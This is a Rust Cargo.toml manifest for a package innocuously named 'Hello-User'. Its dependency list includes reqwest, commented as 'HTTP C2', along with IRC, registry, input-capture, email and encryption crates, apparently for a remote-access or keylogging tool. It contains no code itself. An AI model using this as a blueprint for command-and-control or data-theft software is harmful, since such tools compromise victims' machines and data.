[package]
name = "Hello-User"
version = "1.0.0"
edition = "2021"

[dependencies]
tokio = { version = "1.38", features = ["full"] }     # async runtime
reqwest = { version = "0.12", features = ["json"] }  # HTTP C2
serde = { version = "1.0", features = ["derive"] }
toml = "0.8"
rand = "0.8"
sysinfo = "0.30"                                     # เช็คระบบ
lettre = { version = "0.11", features = ["tokio1-native-tls"] }
irc = "0.15"
winreg = "0.52"
rdev = "0.5"
chrono = "0.4"
lazy_static = "1.4"
sha3 = "0.10"
futures = "0.3"
base64 = { version = "0.21", features = ["std"] }
mac_address = "1.1"
aes-gcm = "0.10"
itertools = "0.12"